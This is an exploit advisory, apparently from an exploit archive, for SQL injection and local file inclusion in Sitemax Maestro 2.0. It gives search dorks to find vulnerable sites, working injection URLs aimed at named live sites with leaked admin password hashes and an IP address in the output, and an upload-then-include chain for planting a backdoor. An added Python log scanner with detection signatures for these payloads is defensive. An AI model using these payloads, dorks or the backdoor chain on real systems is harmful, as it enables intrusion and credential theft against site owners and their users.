Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability
2012-09-04T00:00:00
ID: 1337DAY-ID-19323 | Type: zdt | Reporter: AkaStep | Modified: 2012-09-04T00:00:00
Description
Exploit for php platform in category web applications
========================================
Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)
Sitemax Maestro v. 2.0
Vendor: http://sitemax.am/
License Type: Commercial
Discovered and exploited in the wild
=========================================
Dork 1:
site:am pages.php?al=
Dork 2:
site:am swlang.php
Dork 3:
Designed and developed by SiteMax IT
Sitemax Maestro v. 2.0
=========================================
Error-based blind SQLi:
http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1
http://megasport.am/maestro/ <== Admin Panel
Megasport
2012-09-03 05:51
Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1
SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1
If the MySQL version is > 5.1 you can also use this way (funny pow() failure ;)):
http://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1
Demo 2 and New technique:
http://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1
2012-09-02 19:59
Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','getosdur@localhost.tld','130.193.121.51') from dual limit 1))),(rand() * 1e100))'
SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1
Local File Inclusion:
After gaining access to the admin panel: upload your backdoor as a backdoor.gif file using site.am/pfs.php
Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==
Enjoy your backdoor on the server )
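Detection logic for the two error-based SQLi tricks and the null-byte include described above, added here as an example and not part of the original advisory; the signature names, the Apache combined-log format and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the advisory's request patterns, matched against the URL-decoded
# request target: floor(rand(0)*2)...group by (duplicate-entry error), pow()/hex()
# DOUBLE overflow, reads of the user table, and a null-byte path-traversal include.
SIGNATURES = {
    "sqli_dup_entry_floor_rand": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).+group\s+by", re.I | re.S),
    "sqli_pow_double_overflow": re.compile(
        r"pow\s*\(.+hex\s*\(.+rand\s*\(\s*\).*\*\s*1e\d+", re.I | re.S),
    "sqli_user_table_read": re.compile(r"\bsed_users\b|information_schema\.", re.I),
    "lfi_null_byte_traversal": re.compile(r"\.\./.*\x00|\x00.*\.\./", re.S),
}

# Apache combined log: client IP ... "METHOD target HTTP/x.y" status (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_request(target):
    """Return the sorted names of all signatures matching a raw request target."""
    decoded = unquote_plus(target)  # %27, %00, %20 become the real characters
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(lines):
    """Return (client_ip, script, status, matches) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        ip, _method, target, status = m.groups()
        matches = classify_request(target)
        if matches:
            hits.append((ip, target.split("?", 1)[0], int(status), matches))
    return hits

# Constructed sample log lines (not from any real server): one benign request,
# the two SQLi shapes against pages.php, and the swlang.php include.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Sep/2012:05:51:02 +0400] "GET /pages.php?al=about HTTP/1.1" 200 5120',
    '203.0.113.7 - - [03/Sep/2012:05:51:09 +0400] "GET /pages.php?al=1%27%20or%20(select%20floor(rand(0)*2)%20from(select%20count(*),concat((select%20user_name%20from%20sed_users%20limit%201),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20AND%201=%271 HTTP/1.1" 500 812',
    '203.0.113.7 - - [03/Sep/2012:05:52:40 +0400] "GET /pages.php?al=x%27%20or%20(select%20pow((select%20hex((select%20user_name%20from%20sed_users%20limit%201))),rand()*1e100))--%20AND%201=%271 HTTP/1.1" 500 790',
    '203.0.113.7 - - [03/Sep/2012:06:10:15 +0400] "GET /swlang.php?lang=../../datas/users/3-upload.gif%00&redirect=L2FkbWluLnBocA== HTTP/1.1" 200 44',
]

if __name__ == "__main__":
    for ip, script, status, matches in scan_log(SAMPLE_LOG):
        print(f"{ip} {script} {status} -> {', '.join(matches)}")
```

A 500 status paired with a SQLi signature is the strongest indicator here, since both techniques work by forcing the database to raise an error.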
/AkaStep & BOT_25 & HERO_AZE
# 0day.today [2018-01-04] #